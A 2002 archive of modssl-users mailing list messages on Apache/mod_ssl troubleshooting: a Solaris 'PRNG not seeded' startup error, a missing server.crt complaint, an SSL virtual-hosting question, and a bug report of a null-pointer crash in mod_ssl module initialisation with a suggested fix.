User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May  3 17:18:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA14918; Fri, 3 May 2002 17:17:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lemonlainey.com id RAA14877; Fri, 3 May 2002 17:16:25 +0200 (MET DST)
Received: from cscm1xn8ksljgv by lemonlainey.com
	with SMTP (MDaemon.PRO.v5.0.5.R)
	for ; Fri, 03 May 2002 16:16:08 +0100
Message-ID: <006301c1f2b5$79474200$3281b2d5@iii.co.uk>
From: "Kevin Smith" 
To: 
Subject: Apache SSL
Date: Fri, 3 May 2002 16:16:15 +0100
Organization: Netsmith Limited
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0060_01C1F2BD.D94A7200"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Lookup-Warning: reverse lookup on original sender failed
X-Return-Path: kevin@netsmith.ltd.uk
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kevin Smith" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0060_01C1F2BD.D94A7200
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi All,

Does anyone know how to get round this problem when starting-up Apache =
SSL :

I have, /usr/local/bin/prngd /var/spool/prngd/pool, running so not sure =
what's wrong ?=20

[Fri May  3 15:55:06 2002] [error] mod_ssl: Init: Failed to generate =
temporary 512 bit RSA private key (OpenSSL library error follows)
[Fri May  3 15:55:06 2002] [error] OpenSSL: error:24064064:random number =
generator:SSLEAY_RAND_BYTES:PRNG not seeded
[Fri May  3 15:55:06 2002] [error] OpenSSL: error:04069003:rsa =
routines:RSA_generate_key:BN lib


Many thanks,

Kevin Smith

------=_NextPart_000_0060_01C1F2BD.D94A7200
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable











Hi All,



Does anyone know how to get round this problem when starting-up =
Apache=20
SSL :


 


I have, /usr/local/bin/prngd /var/spool/prngd/pool, running so =
not=20
sure what's wrong ?=20

 


[Fri May  3 15:55:06 2002] [error] mod_ssl: Init: Failed to =
generate=20
temporary 512 bit RSA private key (OpenSSL library error =
follows)
[Fri=20
May  3 15:55:06 2002] [error] OpenSSL: error:24064064:random number =

generator:SSLEAY_RAND_BYTES:PRNG not seeded
[Fri May  3 15:55:06 =
2002]=20
[error] OpenSSL: error:04069003:rsa routines:RSA_generate_key:BN =
lib


 


Many thanks,


 


Kevin Smith


------=_NextPart_000_0060_01C1F2BD.D94A7200--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May  3 18:05:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA18534; Fri, 3 May 2002 18:04:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from serv id SAA18517; Fri, 3 May 2002 18:04:10 +0200 (MET DST)
X-ITHouse-Forward-Path: 
Received: From nwadm by serv (IT House Mail Server [IT-B0-D45F090A-345080B0]); Fri, 3 May 2002 11:32:24 -0700
Message-ID: <00ae01c1f2bc$104cb300$9865fea9@nwadm>
From: "Subscribed" 
To: 
References: <006301c1f2b5$79474200$3281b2d5@iii.co.uk>
Subject: Re: Apache SSL
Date: Fri, 3 May 2002 11:03:24 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_00AB_01C1F292.25029DC0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Subscribed" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_00AB_01C1F292.25029DC0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Did you make your openssl certificate?=20
Is it referenced in your httpd.conf?
Perhaps openssl's library needs to be recompiled?
or your ssl module? Whave version of Apache are you running?
Just my shotgun approach. :()




=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
"The things that come to those that wait may be
the things left by those who got there first."
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
  ----- Original Message -----=20
  From: Kevin Smith=20
  To: modssl-users@modssl.org=20
  Sent: Friday, May 03, 2002 10:16 AM
  Subject: Apache SSL


  Hi All,

  Does anyone know how to get round this problem when starting-up Apache =
SSL :

  I have, /usr/local/bin/prngd /var/spool/prngd/pool, running so not =
sure what's wrong ?=20

  [Fri May  3 15:55:06 2002] [error] mod_ssl: Init: Failed to generate =
temporary 512 bit RSA private key (OpenSSL library error follows)
  [Fri May  3 15:55:06 2002] [error] OpenSSL: error:24064064:random =
number generator:SSLEAY_RAND_BYTES:PRNG not seeded
  [Fri May  3 15:55:06 2002] [error] OpenSSL: error:04069003:rsa =
routines:RSA_generate_key:BN lib


  Many thanks,

  Kevin Smith

------=_NextPart_000_00AB_01C1F292.25029DC0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Did you make your openssl certificate?=20



Is it referenced in your =
httpd.conf?


Perhaps openssl's library needs to be=20
recompiled?


or your ssl module? Whave version of =
Apache are you=20
running?


Just my shotgun approach. =
:()


 


 


 



=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
"The things that come to =
those=20
that wait may be
the things left by those who got there=20
first."
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D



  
----- Original Message ----- 

  From:=20
  Kevin=20
  Smith 

  
  
Sent: Friday, May 03, 2002 =
10:16 AM

  
Subject: Apache SSL

  


  

  
Hi All,

  

Does anyone know how to get round this problem when =
starting-up=20
  Apache SSL :

  
 

  
I have, /usr/local/bin/prngd /var/spool/prngd/pool, running =
so not=20
  sure what's wrong ?=20
  
 

  
[Fri May  3 15:55:06 2002] [error] mod_ssl: Init: Failed to =
generate=20
  temporary 512 bit RSA private key (OpenSSL library error =
follows)
[Fri=20
  May  3 15:55:06 2002] [error] OpenSSL: error:24064064:random =
number=20
  generator:SSLEAY_RAND_BYTES:PRNG not seeded
[Fri May  3 =
15:55:06 2002]=20
  [error] OpenSSL: error:04069003:rsa routines:RSA_generate_key:BN =
lib

  
 

  
Many thanks,

  
 

  
Kevin Smith


------=_NextPart_000_00AB_01C1F292.25029DC0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May  3 20:09:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA28238; Fri, 3 May 2002 20:08:04 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA28191; Fri, 3 May 2002 20:07:25 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 6E4B64CE74F; Fri,  3 May 2002 20:07:23 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g43HEkn26143; Fri, 3 May 2002 19:14:46 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from meddaid.com id RAA14325; Fri, 3 May 2002 17:10:00 +0200 (MET DST)
From: "David Roberts" 
To: 
Subject: conf/server.crt does not exists or empty
Date: Fri, 3 May 2002 16:09:54 +0100
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David Roberts" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I try to set SSl on oracle Http apache server finaly i am getting server.crt
does not exists or empty error message but there is server.crt file..
cud anyone help me regarding this?

thanks in advance,
Bala,
bala@meddaid.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May  3 20:09:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA28248; Fri, 3 May 2002 20:08:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA28188; Fri, 3 May 2002 20:07:24 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 590024CE745; Fri,  3 May 2002 20:07:23 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g43HEih26137; Fri, 3 May 2002 19:14:44 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id QAA12880; Fri, 3 May 2002 16:52:06 +0200 (MET DST)
Date: Fri, 3 May 2002 16:52:06 +0200 (MET DST)
Message-Id: <200205031452.QAA12880@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] sig 11 in mod_ssl module init (PR#702)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Bart van Leeuwen
Version: various
OS: FreeBSD
Submission from: (NULL) (195.64.50.136)


Situation:
Server has multiple virtual hosts and uses the namevirtualhost option.
A ssl virtual host is defined using its hostname instead of its ip.

Due to a dns failure, 1 of the names used for a ssl virtual host cannot be
resolved.
(can be simulated of course by defining a virtual host with a non existant
name)

When apache starts, it first complains about being unable to resolve the
hostname, then mod_ssl gets a sig 11 in its module init.
Taking a quick peek at the offending code reveals 2 things:
1. the variable addrs, which contains a pointer, is used without verification if
it actually points to anything.
2. mod_ssl contains code that should log a warning about the above
configuration, however, it doesn't log this warning.

Possible fix: first of all ensure there is a null check on addrs, 2nd, if the
check on multiple ssl virtual hosts on a single IP is indeed required, it would
make sense to compare the content of the according field in the addrs struct,
and not the pointer to that content (looks to me like its address is taken and
compared instead of its value)

regards, Bart van Leeuwen
DOOSYS IT Consultants   http://www.doosys.com/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May  3 21:29:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA03503; Fri, 3 May 2002 21:28:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from lemonlainey.com id VAA03459; Fri, 3 May 2002 21:27:41 +0200 (MET DST)
Received: from netsmith by lemonlainey.com
	with SMTP (MDaemon.PRO.v5.0.5.R)
	for ; Fri, 03 May 2002 20:27:26 +0100
Message-ID: <000c01c1f2d8$b9b63b70$c400a8c0@netsmith>
From: "Kevin Smith" 
To: 
References: <006301c1f2b5$79474200$3281b2d5@iii.co.uk> <00ae01c1f2bc$104cb300$9865fea9@nwadm>
Subject: Re: Apache SSL
Date: Fri, 3 May 2002 20:28:12 +0100
Organization: Netsmith Limited
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0009_01C1F2E1.0BADD6B0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Return-Path: kevin@netsmith.ltd.uk
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kevin Smith" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0009_01C1F2E1.0BADD6B0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Yep, works on one server but not the other... Solaris platform.

Could it be to do with /dev/random not being installed?

  ----- Original Message -----=20
  From: Subscribed=20
  To: modssl-users@modssl.org=20
  Sent: Friday, May 03, 2002 5:03 PM
  Subject: Re: Apache SSL


  Did you make your openssl certificate?=20
  Is it referenced in your httpd.conf?
  Perhaps openssl's library needs to be recompiled?
  or your ssl module? Whave version of Apache are you running?
  Just my shotgun approach. :()




  =
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
  "The things that come to those that wait may be
  the things left by those who got there first."
  =
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
    ----- Original Message -----=20
    From: Kevin Smith=20
    To: modssl-users@modssl.org=20
    Sent: Friday, May 03, 2002 10:16 AM
    Subject: Apache SSL


    Hi All,

    Does anyone know how to get round this problem when starting-up =
Apache SSL :

    I have, /usr/local/bin/prngd /var/spool/prngd/pool, running so not =
sure what's wrong ?=20

    [Fri May  3 15:55:06 2002] [error] mod_ssl: Init: Failed to generate =
temporary 512 bit RSA private key (OpenSSL library error follows)
    [Fri May  3 15:55:06 2002] [error] OpenSSL: error:24064064:random =
number generator:SSLEAY_RAND_BYTES:PRNG not seeded
    [Fri May  3 15:55:06 2002] [error] OpenSSL: error:04069003:rsa =
routines:RSA_generate_key:BN lib


    Many thanks,

    Kevin Smith

------=_NextPart_000_0009_01C1F2E1.0BADD6B0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Yep, works on one server but =
not the=20
other... Solaris platform.


 


Could it be to do with =
/dev/random not=20
being installed?


 



  
----- Original Message ----- 

  From:=20
  Subscribed 
  
  
Sent: Friday, May 03, 2002 5:03 =
PM

  
Subject: Re: Apache SSL

  


  
Did you make your openssl =
certificate?=20
  

  
Is it referenced in your =
httpd.conf?

  
Perhaps openssl's library needs to be =

  recompiled?

  
or your ssl module? Whave version of =
Apache are=20
  you running?

  
Just my shotgun approach. =
:()

  
 

  
 

  
 

  =


=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
"The things that come to=20
  those that wait may be
the things left by those who got there=20
  =
first."
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

  

    
----- Original Message ----- 

    From:=20
    Kevin=20
    Smith 
    
    
Sent: Friday, May 03, 2002 =
10:16=20
    AM

    
Subject: Apache SSL

    


    

    
Hi All,

    

Does anyone know how to get round this problem when =
starting-up=20
    Apache SSL :

    
 

    
I have, /usr/local/bin/prngd /var/spool/prngd/pool, =
running so not=20
    sure what's wrong ?=20
    
 

    
[Fri May  3 15:55:06 2002] [error] mod_ssl: Init: Failed =
to=20
    generate temporary 512 bit RSA private key (OpenSSL library error=20
    follows)
[Fri May  3 15:55:06 2002] [error] OpenSSL:=20
    error:24064064:random number generator:SSLEAY_RAND_BYTES:PRNG not=20
    seeded
[Fri May  3 15:55:06 2002] [error] OpenSSL:=20
    error:04069003:rsa routines:RSA_generate_key:BN lib

    
 

    
Many thanks,

    
 

    
Kevin=20
Smith


------=_NextPart_000_0009_01C1F2E1.0BADD6B0--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May  3 21:47:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA04790; Fri, 3 May 2002 21:46:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from imo-r01.mx.aol.com id VAA04781; Fri, 3 May 2002 21:46:06 +0200 (MET DST)
Received: from gjmwalsh@netscape.net
	by imo-r01.mx.aol.com (mail_out_v32.5.) id m.f0.3cb050a (16215)
	 for ; Fri, 3 May 2002 15:45:19 -0400 (EDT)
Received: from  netscape.com (mow-m09.webmail.aol.com [64.12.184.137]) by air-in01.mx.aol.com (v84.14) with ESMTP id MAILININ13-0503154518; Fri, 03 May 2002 15:45:18 -0400
Date: Fri, 03 May 2002 15:45:18 -0400
From: gjmwalsh@netscape.net (George Walsh)
To: modssl-users@modssl.org
Subject: RE: Re: Apache SSL
Message-ID: <684CCB49.0A698DFF.009AA07D@netscape.net>
X-Mailer: Atlas Mailer 2.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: gjmwalsh@netscape.net (George Walsh)
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Absolutely, Kevin.

I remember that battle with UnixWare too ...



>Yep, works on one server but not the other... Solaris platform.
>
>Could it be to do with /dev/random not being installed?
>
>  ----- Original Message -----
>  From: Subscribed
>  To: modssl-users@modssl.org
>  Sent: Friday, May 03, 2002 5:03 PM
>  Subject: Re: Apache SSL
>
>
>  Did you make your openssl certificate?
>  Is it referenced in your httpd.conf?
>  Perhaps openssl's library needs to be recompiled?
>  or your ssl module? Whave version of Apache are you running?
>  Just my shotgun approach. :()
>
>
>
>
>  ====================================
>  "The things that come to those that wait may be
>  the things left by those who got there first."
>  ====================================
>    ----- Original Message -----
>    From: Kevin Smith
>    To: modssl-users@modssl.org
>    Sent: Friday, May 03, 2002 10:16 AM
>    Subject: Apache SSL
>
>
>    Hi All,
>
>    Does anyone know how to get round this problem when starting-up Apache SSL :
>
>    I have, /usr/local/bin/prngd /var/spool/prngd/pool, running so not sure what's wrong ?
>
>    [Fri May  3 15:55:06 2002] [error] mod_ssl: Init: Failed to generate temporary 512 bit RSA private key (OpenSSL library error follows)
>    [Fri May  3 15:55:06 2002] [error] OpenSSL: error:24064064:random number generator:SSLEAY_RAND_BYTES:PRNG not seeded
>    [Fri May  3 15:55:06 2002] [error] OpenSSL: error:04069003:rsa routines:RSA_generate_key:BN lib
>
>
>    Many thanks,
>
>    Kevin Smith
>


-- 
George Walsh,
Managing Director,
CruiseRoutes Division,
DSC Directional Services Corp
Courtenay, British Columbia, Canada




__________________________________________________________________
Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/

Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May  3 22:14:28 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA07121; Fri, 3 May 2002 22:13:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from UberGeek id WAA07081; Fri, 3 May 2002 22:12:37 +0200 (MET DST)
Received: (qmail 18951 invoked by uid 500); 3 May 2002 20:12:30 -0000
Subject: Re: Apache SSL
From: Austin Gonyou 
To: modssl-users@modssl.org
In-Reply-To: <000c01c1f2d8$b9b63b70$c400a8c0@netsmith>
References: <000c01c1f2d8$b9b63b70$c400a8c0@netsmith>
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature";
	boundary="=-iD5ruyC9TY1Cs1Q+bPVQ"
X-Mailer: Ximian Evolution 1.0.4.99 
Date: 03 May 2002 15:12:30 -0500
Message-Id: <1020456750.18891.2.camel@UberGeek>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Austin Gonyou 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


--=-iD5ruyC9TY1Cs1Q+bPVQ
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Yeouch! You should either have Prngd, or some kind of /dev/random
/dev/urandom on there. Apache does have it's *built-in* by default,
though it's not truly recommended for production use.=20

Solaris doesn't do SSL well. :(

There is an official backport from Solaris 9, to solaris 7 and 8 for an
official /dev/random and /dev/urandom devices. Search over at bigadmin,
and you should find it.

On Fri, 2002-05-03 at 14:28, Kevin Smith wrote:
> Yep, works on one server but not the other... Solaris platform.
> =20
> Could it be to do with /dev/random not being installed?
> =20
>=20
> ----- Original Message -----=20
> From: Subscribed  =20
> To: modssl-users@modssl.org  =20
> Sent: Friday, May 03, 2002 5:03 PM
> Subject: Re: Apache SSL
>=20
> Did you make your openssl certificate?=20
> Is it referenced in your httpd.conf?
> Perhaps openssl's library needs to be recompiled?
> or your ssl module? Whave version of Apache are you running?
> Just my shotgun approach. :()
> =20
> =20
> =20
>=20
> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> "The things that come to those that wait may be
> the things left by those who got there first."
> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
>=20
> ----- Original Message -----=20
> From: Kevin   Smith=20
> To: modssl-users@modssl.org  =20
> Sent: Friday, May 03, 2002 10:16 AM
> Subject: Apache SSL
>=20
>=20
> Hi All,
>=20
>=20
> Does anyone know how to get round this problem when starting-up Apache
> SSL :
> =20
> I have, /usr/local/bin/prngd /var/spool/prngd/pool, running so not sure
> what's wrong ?=20
> =20
> [Fri May  3 15:55:06 2002] [error] mod_ssl: Init: Failed to generate
> temporary 512 bit RSA private key (OpenSSL library error follows)
> [Fri May  3 15:55:06 2002] [error] OpenSSL: error:24064064:random number
> generator:SSLEAY_RAND_BYTES:PRNG not seeded
> [Fri May  3 15:55:06 2002] [error] OpenSSL: error:04069003:rsa
> routines:RSA_generate_key:BN lib
>=20
> =20
> Many thanks,
> =20
> Kevin Smith
>=20
--=20
Austin Gonyou
Systems Architect, CCNA
Coremetrics, Inc.
Phone: 512-698-7250
email: austin@coremetrics.com

"It is the part of a good shepherd to shear his flock, not to skin it."
Latin Proverb

--=-iD5ruyC9TY1Cs1Q+bPVQ
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQA80u8u94g6ZVmFMoIRAh5fAJ9AANwyvM3GvbyQ1NnjEUuNgzZQUwCfa487
lVydjPthmGz1EeNTdz5RP3Q=
=M9OI
-----END PGP SIGNATURE-----

--=-iD5ruyC9TY1Cs1Q+bPVQ--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May  3 22:30:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA08367; Fri, 3 May 2002 22:29:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from imo-r04.mx.aol.com id WAA08317; Fri, 3 May 2002 22:28:22 +0200 (MET DST)
Received: from gjmwalsh@netscape.net
	by imo-r04.mx.aol.com (mail_out_v32.5.) id m.1b7.147f5b (16237)
	 for ; Fri, 3 May 2002 16:28:08 -0400 (EDT)
Received: from  netscape.com (mow-m27.webmail.aol.com [64.12.137.4]) by air-in03.mx.aol.com (v84.14) with ESMTP id MAILININ31-0503162808; Fri, 03 May 2002 16:28:08 -0400
Date: Fri, 03 May 2002 16:28:08 -0400
From: gjmwalsh@netscape.net (George Walsh)
To: modssl-users@modssl.org
Subject: RE: Apache SSL
Message-ID: <636D6C6A.707DCF0C.009AA07D@netscape.net>
X-Mailer: Atlas Mailer 2.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: gjmwalsh@netscape.net (George Walsh)
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Kevin, since you are dealing with a Solaris system, you might find www.sunfreeware.com/README.prngd (written by the author of PRNGD) to be what will get you through that particular nightmare.

Sure did it for me!

Good luck.

-- 
George Walsh,
Managing Director,
CruiseRoutes Division,
DSC Directional Services Corp
Courtenay, British Columbia, Canada




__________________________________________________________________
Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/

Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May  4 09:42:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA17164; Sat, 4 May 2002 09:41:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA17152; Sat, 4 May 2002 09:40:53 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 787B14CE745; Sat,  4 May 2002 09:40:52 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g447edl12422; Sat, 4 May 2002 09:40:39 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from omta02.mta.everyone.net id GAA07034; Sat, 4 May 2002 06:16:08 +0200 (MET DST)
Received: from sitemail.everyone.net (dsnat [216.200.145.62])
	by omta02.mta.everyone.net (Postfix) with ESMTP id 161EE1C47F0
	for ; Fri,  3 May 2002 21:16:07 -0700 (PDT)
Received: by sitemail.everyone.net (Postfix, from userid 99)
	id D5CD336F9; Fri,  3 May 2002 21:16:06 -0700 (PDT)
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0
X-Mailer: MIME-tools 5.41 (Entity 5.404)
Date: Fri, 3 May 2002 21:16:06 -0700 (PDT)
From: Nisarg Rav 
To: modssl-users@modssl.org
Cc: modssl-users@modssl.org
Subject: help needed for virtualhosting + SSL configuration.
X-Originating-Ip: [203.88.129.229]
Message-Id: <20020504041606.D5CD336F9@sitemail.everyone.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nisarg Rav 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

hello gurus ,

      I've installed and configured apache-1.3.23 + openssl-0.9.6b + mod_ssl and mod_perl successfully.
      It is working fine for my main site and self signed ssl certificate.

      I want to do IP based virtual hosting for more one site and want to serve that site through self signed ssl certificate. 
      so may i get help to configure httpd.conf to full fill my requirement .

Regards 

Nisarg Rav 

_____________________________________________________________
Want a new web-based email account ? ---> http://www.firstlinux.net

_____________________________________________________________
Promote your group and strengthen ties to your members with email@yourgroup.org by Everyone.net  http://www.everyone.net/?btn=tag
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May  4 19:29:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA20840; Sat, 4 May 2002 19:28:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailgate5.cinetic.de id TAA20787; Sat, 4 May 2002 19:27:31 +0200 (MET DST)
Received: from web.de (fmomail02.dlan.cinetic.de [172.20.1.46])
